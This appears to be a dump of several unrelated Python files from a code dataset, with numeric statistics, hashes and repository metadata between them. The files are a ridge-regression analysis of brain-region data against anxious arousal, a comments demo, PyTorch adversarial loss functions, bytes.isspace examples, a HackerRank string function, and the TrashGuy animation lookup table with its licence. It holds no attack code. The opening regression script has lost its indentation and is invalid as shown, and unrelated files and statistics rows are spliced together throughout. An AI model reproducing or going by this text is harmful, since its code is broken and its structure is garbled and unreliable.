print('Left ifg to Anx Arousal Wave 1 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg with Anx Arousal',1,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_w2,anxious_arousal_w2)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_w2[train],anxious_arousal_w2[train])
print('WAVE 2 R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_w2[train],anxious_arousal_w2[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_w2[test])
y_truth[counter,:] = anxious_arousal_w2[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_w2)), np.reshape(y_truth,len(anxious_arousal_w2)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
print('Left ifg to Anx Arousal WAVE 2 MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg with Anx Arousal',2,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_w1,anxious_arousal_w1)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_w1[train],anxious_arousal_w1[train])
print('WAVE 1 R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_w1[train],anxious_arousal_w1[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_w1[test])
y_truth[counter,:] = anxious_arousal_w1[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_w1)), np.reshape(y_truth,len(anxious_arousal_w1)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_w1)),np.reshape(y_truth,len(anxious_arousal_w1)))
print('RIGHT ifg to anx app WAVE 1 MSE :{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg with Anx Arousal',1,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_w2,anxious_arousal_w2)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_w2[train],anxious_arousal_w2[train])
print('WAVE 2 R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_w2[train],anxious_arousal_w2[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_w2[test])
y_truth[counter,:] = anxious_arousal_w2[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_w2)), np.reshape(y_truth,len(anxious_arousal_w2)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_w2)),np.reshape(y_truth,len(anxious_arousal_w2)))
print('Right ifg to WAVE 2 MSE RIGHT:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg with Anx Arousal',2,CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Left_ifg_longitudinal,anxious_arousal_longitudinal)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Left_ifg_longitudinal[train],anxious_arousal_longitudinal[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Left_ifg_longitudinal[train],anxious_arousal_longitudinal[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Left_ifg_longitudinal[test])
y_truth[counter,:] = anxious_arousal_longitudinal[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_longitudinal)), np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
print('Left Longitdinal MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Left ifg-Diff with Anx Arousal change','longitudinal',CorrPear,CorrSp]
master_csv.append(current_line)
y_predict = np.zeros((n_folds,13)) #rows=n_iterations, col=test_size
y_truth = np.zeros((n_folds,13))
coefs = np.zeros((n_folds,258))
hparam = np.zeros((n_folds,1))
counter = 0
for k, (train, test) in enumerate(kf.split(Right_ifg_longitudinal,anxious_arousal_longitudinal)):
Ridge_cv = linear_model.RidgeCV(alphas=np.arange(0.01,10,0.1))
Ridge_cv.fit(Right_ifg_longitudinal[train],anxious_arousal_longitudinal[train])
print('R^2 of Ridge= {}'.format(Ridge_cv.score(Right_ifg_longitudinal[train],anxious_arousal_longitudinal[train]))) #execute LOO nested CV just on training set (NESTED)
hparam[counter,0] = Ridge_cv.alpha_
y_predict[counter,:]=Ridge_cv.predict(Right_ifg_longitudinal[test])
y_truth[counter,:] = anxious_arousal_longitudinal[test]
coefs[counter,:] = Ridge_cv.coef_
counter = counter +1
print(hparam)
MSE = mean_squared_error(np.reshape(y_predict,len(anxious_arousal_longitudinal)), np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrSp = scipy.stats.spearmanr(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrTau = scipy.stats.kendalltau(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
CorrPear = scipy.stats.pearsonr(np.reshape(y_predict,len(anxious_arousal_longitudinal)),np.reshape(y_truth,len(anxious_arousal_longitudinal)))
print('RIGHT Long MSE:{} Corr Spearman:{} Corr Tau: {} Corr Pearson: {}\n\n'.format(MSE,CorrSp,CorrTau,CorrPear))
current_line=['Right ifg-Diff with Anx Arousal change','longitudinal',CorrPear,CorrSp]
master_csv.append(current_line)
with open('RESULTS_ifg_DataDriven.csv','a') as f:
writer=csv.writer(f)
writer.writerows(master_csv)
| 51.62619
| 174
| 0.791818
| 3,425
| 21,683
| 4.747153
| 0.048759
| 0.05314
| 0.059044
| 0.038379
| 0.943785
| 0.929085
| 0.929085
| 0.924596
| 0.920598
| 0.920598
| 0
| 0.020206
| 0.066458
| 21,683
| 419
| 175
| 51.749403
| 0.783025
| 0.067841
| 0
| 0.707006
| 0
| 0.025478
| 0.098418
| 0.017767
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.035032
| 0
| 0.035032
| 0.11465
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cab07f6c7c72b566795281062a0169a4b1feee19
| 242
|
py
|
Python
|
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
Chapter_2/Comments/Comments.py
|
random-forest-ai/python_course
|
cd6b7f30e1932312c05178e6bb66cc95c72fe6c1
|
[
"MIT"
] | null | null | null |
if __name__ == '__main__':
# This is a line printing Hello World
# This is a second line comment
'''
This is a line printing Hello World
This is a second line comment
'''
print("Hello World") # This is a comment
| 22
| 44
| 0.632231
| 36
| 242
| 4.027778
| 0.361111
| 0.206897
| 0.241379
| 0.331034
| 0.848276
| 0.731034
| 0.731034
| 0.731034
| 0.731034
| 0.731034
| 0
| 0
| 0.293388
| 242
| 10
| 45
| 24.2
| 0.847953
| 0.342975
| 0
| 0
| 0
| 0
| 0.279412
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
cac8e43ae44fc61f8485e6d0d9765ce4cec8c192
| 5,392
|
py
|
Python
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | 2
|
2022-02-14T15:40:49.000Z
|
2022-02-27T02:29:39.000Z
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | 2
|
2022-03-06T10:54:24.000Z
|
2022-03-26T06:45:21.000Z
|
loss/adversarial_loss_gen.py
|
himashi92/vizviva_brats_2021
|
7b7c5d157a98bf9d1a96c3ca2633aad6c2132475
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
CE = nn.BCELoss()
def adv_loss_gen_v1(critic_segs_1, critic_segs_2, label):
critic_segs_1_1 = critic_segs_1[:,0,:,:,:]
critic_segs_1_2 = critic_segs_1[:,1,:,:,:]
critic_segs_1_3 = critic_segs_1[:,2,:,:,:]
critic_segs_2_1 = critic_segs_2[:,0,:,:,:]
critic_segs_2_2 = critic_segs_2[:,1,:,:,:]
critic_segs_2_3 = critic_segs_2[:,2,:,:,:]
target_real_1 = torch.ones_like(label[:,1,:,:,:])
target_real_1.cuda()
target_fake_1 = torch.zeros_like(label[:,1,:,:,:])
target_fake_1.cuda()
adv_loss1 = (CE(critic_segs_1_1, target_fake_1) + CE(critic_segs_1_2, target_fake_1) + CE(critic_segs_1_3, target_fake_1))/3
adv_loss2 = (CE(critic_segs_2_1, target_fake_1) + CE(critic_segs_2_2, target_fake_1) + CE(critic_segs_2_3,
target_fake_1))/3
adv_loss = adv_loss1 + adv_loss2
return adv_loss
def adv_loss_gen(critic_segs_1, critic_segs_2, critic_segs_3, critic_segs_4, label):
critic_segs_1_1 = critic_segs_1[:,0,:,:,:]
critic_segs_1_2 = critic_segs_1[:,1,:,:,:]
critic_segs_1_3 = critic_segs_1[:,2,:,:,:]
critic_segs_2_1 = critic_segs_2[:,0,:,:,:]
critic_segs_2_2 = critic_segs_2[:,1,:,:,:]
critic_segs_2_3 = critic_segs_2[:,2,:,:,:]
critic_segs_3_1 = critic_segs_3[:,0,:,:,:]
critic_segs_3_2 = critic_segs_3[:,1,:,:,:]
critic_segs_3_3 = critic_segs_3[:,2,:,:,:]
critic_segs_4_1 = critic_segs_4[:,0,:,:,:]
critic_segs_4_2 = critic_segs_4[:,1,:,:,:]
critic_segs_4_3 = critic_segs_4[:,2,:,:,:]
target_real_1 = torch.ones_like(label[:,1,:,:,:])
target_real_1.cuda()
target_fake_1 = torch.zeros_like(label[:,1,:,:,:])
target_fake_1.cuda()
adv_loss1 = (CE(critic_segs_1_1, target_fake_1) + CE(critic_segs_1_2, target_fake_1) + CE(critic_segs_1_3, target_fake_1))/3
adv_loss2 = (CE(critic_segs_2_1, target_fake_1) + CE(critic_segs_2_2, target_fake_1) + CE(critic_segs_2_3,
target_fake_1))/3
adv_loss3 = (CE(critic_segs_3_1, target_fake_1) + CE(critic_segs_3_2, target_fake_1) + CE(critic_segs_3_3,
target_fake_1))/3
adv_loss4 = (CE(critic_segs_4_1, target_fake_1) + CE(critic_segs_4_2, target_fake_1) + CE(critic_segs_4_3,
target_fake_1))/3
adv_loss = adv_loss1 + adv_loss2 + adv_loss3 + adv_loss4
return adv_loss
def adv_loss_critic_v1(critic_segs_1, critic_segs_3, label):
critic_segs_1_1 = critic_segs_1[:,0,:,:,:]
critic_segs_1_2 = critic_segs_1[:,1,:,:,:]
critic_segs_1_3 = critic_segs_1[:,2,:,:,:]
critic_segs_3_1 = critic_segs_3[:,0,:,:,:]
critic_segs_3_2 = critic_segs_3[:,1,:,:,:]
critic_segs_3_3 = critic_segs_3[:,2,:,:,:]
target_real_1 = torch.ones_like(label[:,1,:,:,:])
target_real_1.cuda()
target_fake_1 = torch.zeros_like(label[:,1,:,:,:])
target_fake_1.cuda()
adv_loss1 = (CE(critic_segs_1_1, target_fake_1) + CE(critic_segs_1_2, target_fake_1) + CE(critic_segs_1_3, target_fake_1))/3
adv_loss3 = (CE(critic_segs_3_1, target_real_1) + CE(critic_segs_3_2, target_real_1) + CE(critic_segs_3_3,
target_real_1))/3
adv_loss = adv_loss1 + adv_loss3
return adv_loss
def adv_loss_critic(critic_segs_1, critic_segs_2, critic_segs_3, critic_segs_4, label):
critic_segs_1_1 = critic_segs_1[:,0,:,:,:]
critic_segs_1_2 = critic_segs_1[:,1,:,:,:]
critic_segs_1_3 = critic_segs_1[:,2,:,:,:]
critic_segs_2_1 = critic_segs_2[:,0,:,:,:]
critic_segs_2_2 = critic_segs_2[:,1,:,:,:]
critic_segs_2_3 = critic_segs_2[:,2,:,:,:]
critic_segs_3_1 = critic_segs_3[:,0,:,:,:]
critic_segs_3_2 = critic_segs_3[:,1,:,:,:]
critic_segs_3_3 = critic_segs_3[:,2,:,:,:]
critic_segs_4_1 = critic_segs_4[:,0,:,:,:]
critic_segs_4_2 = critic_segs_4[:,1,:,:,:]
critic_segs_4_3 = critic_segs_4[:,2,:,:,:]
target_real_1 = torch.ones_like(label[:,1,:,:,:])
target_real_1.cuda()
target_fake_1 = torch.zeros_like(label[:,1,:,:,:])
target_fake_1.cuda()
adv_loss1 = (CE(critic_segs_1_1, target_fake_1) + CE(critic_segs_1_2, target_fake_1) + CE(critic_segs_1_3, target_fake_1))/3
adv_loss2 = (CE(critic_segs_2_1, target_fake_1) + CE(critic_segs_2_2, target_fake_1) + CE(critic_segs_2_3,
target_fake_1))/3
adv_loss3 = (CE(critic_segs_3_1, target_real_1) + CE(critic_segs_3_2, target_real_1) + CE(critic_segs_3_3,
target_real_1))/3
adv_loss4 = (CE(critic_segs_4_1, target_real_1) + CE(critic_segs_4_2, target_real_1) + CE(critic_segs_4_3,
target_real_1))/3
adv_loss = adv_loss1 + adv_loss2 + adv_loss3 + adv_loss4
return adv_loss
| 44.933333
| 129
| 0.580675
| 820
| 5,392
| 3.25
| 0.037805
| 0.450281
| 0.165103
| 0.117073
| 0.977111
| 0.977111
| 0.949343
| 0.881426
| 0.881426
| 0.881426
| 0
| 0.083934
| 0.279674
| 5,392
| 120
| 130
| 44.933333
| 0.602214
| 0
| 0
| 0.862069
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045977
| false
| 0
| 0.022989
| 0
| 0.114943
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
caea3269f23342c37d22415b07d0fbcebe6a5850
| 712
|
py
|
Python
|
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | 39
|
2017-07-31T22:54:01.000Z
|
2017-08-31T00:19:03.000Z
|
03/03/isspace.py
|
pylangstudy/201708
|
126b1af96a1d1f57522d5a1d435b58597bea2e57
|
[
"CC0-1.0"
] | null | null | null |
s = b'abc'; print(s.isspace(), s)
s = b'a-c'; print(s.isspace(), s)
s = b'a c'; print(s.isspace(), s)
s = b'a\tc'; print(s.isspace(), s)
s = b' '; print(s.isspace(), s)#半角スペースつ3
s = b'\r\n'; print(s.isspace(), s)
#s = b' '; print(s.isspace(), s)#全角スペース SyntaxError: bytes can only contain ASCII literal characters.
s = bytearray(b'abc'); print(s.isspace(), s)
s = bytearray(b'a-c'); print(s.isspace(), s)
s = bytearray(b'a c'); print(s.isspace(), s)
s = bytearray(b'a\tc'); print(s.isspace(), s)
s = bytearray(b' '); print(s.isspace(), s)#半角スペースつ3
s = bytearray(b'\r\n'); print(s.isspace(), s)
#s = bytearray(b' '); print(s.isspace(), s)#全角スペース SyntaxError: bytes can only contain ASCII literal characters.
| 44.5
| 112
| 0.622191
| 129
| 712
| 3.434109
| 0.162791
| 0.189616
| 0.410835
| 0.442438
| 0.954853
| 0.954853
| 0.954853
| 0.896163
| 0.873589
| 0.873589
| 0
| 0.003252
| 0.136236
| 712
| 15
| 113
| 47.466667
| 0.717073
| 0.316011
| 0
| 0
| 0
| 0
| 0.08316
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
1b0c2eef13159d2aea7fc63354f0bfc6168195e2
| 113
|
py
|
Python
|
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | 2
|
2020-11-19T19:03:28.000Z
|
2021-01-04T19:52:11.000Z
|
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | null | null | null |
Python/HackerRank/mutations.py
|
habibullahturkmen/kodluyoruzilkrepo
|
b438657580450b0b68fc1db140b8079738ef5a36
|
[
"MIT"
] | null | null | null |
def mutate_string(string, position, character):
return string[:position] + character + string[position + 1:]
| 37.666667
| 64
| 0.734513
| 13
| 113
| 6.307692
| 0.538462
| 0.512195
| 0.560976
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.141593
| 113
| 2
| 65
| 56.5
| 0.835052
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
943f247feba6100729ec0fc30040e3ba5e8aea3a
| 13,123
|
py
|
Python
|
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | 1
|
2022-03-11T00:17:22.000Z
|
2022-03-11T00:17:22.000Z
|
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | null | null | null |
trashguy/lut.py
|
jonatan1609/TrashGuy
|
ad26cca8d643bf74861966bc2a40321260de1d3d
|
[
"MIT"
] | null | null | null |
# ================================================= #
# Trash Guy Animation #
# (> ^_^)> #
# Made by Zac (trashguy@zac.cy) #
# Version 4.1.0+20201210 #
# Donate: #
# 12Na1AmuGMCQYsxwM7ZLSr1sgfZacZFYxa #
# ================================================= #
# Copyright (C) 2020 Zac (trashguy@zac.cy) #
# Permission is hereby granted, free of charge, to #
# any person obtaining a copy of this software and #
# associated documentation files (the "Software"), #
# to deal in the Software without restriction, #
# including without limitation the rights to use, #
# copy, modify, merge, publish, distribute, #
# sublicense, and/or sell copies of the Software, #
# and to permit persons to whom the Software is #
# furnished to do so, subject to the following #
# conditions: The above copyright notice and this #
# permission notice shall be included in all copies #
# or substantial portions of the Software. #
# ================================================= #
#
# ================================================= #
# If you rewrite this software in a different #
# programming language or create a derivative #
# work, please be kind and include this notice #
# and the below credit along with the license: #
# #
# This work is based on the original TrashGuy #
# animation (https://github.com/trash-guy/TrashGuy) #
# written by Zac (trashguy@zac.cy). #
# #
# ================================================= #
# Look-up table of commonly used indices for instant conversion
# Generated with generate_lut.py
_LUT = (
(0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (0, 7), (1, 9), (1, 9),
(1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (1, 9), (2, 11), (2, 11),
(2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11), (2, 11),
(2, 11), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13),
(3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (3, 13), (4, 15), (4, 15),
(4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (4, 15),
(4, 15), (4, 15), (4, 15), (4, 15), (4, 15), (5, 17), (5, 17), (5, 17),
(5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17),
(5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (5, 17), (6, 19), (6, 19),
(6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19),
(6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19), (6, 19),
(6, 19), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21),
(7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21),
(7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (7, 21), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (8, 23),
(8, 23), (8, 23), (8, 23), (8, 23), (8, 23), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25),
(9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (9, 25), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27), (10, 27),
(10, 27), (10, 27), (10, 27), (10, 27), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (11, 29),
(11, 29), (11, 29), (11, 29), (11, 29), (11, 29), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31), (12, 31),
(12, 31), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33),
(13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (13, 33), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35),
(14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (14, 35), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37), (15, 37),
(15, 37), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (16, 39),
(16, 39), (16, 39), (16, 39), (16, 39), (16, 39), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41), (17, 41),
(17, 41), (17, 41), (17, 41), (17, 41), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (18, 43),
(18, 43), (18, 43), (18, 43), (18, 43), (18, 43), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45), (19, 45),
(19, 45), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
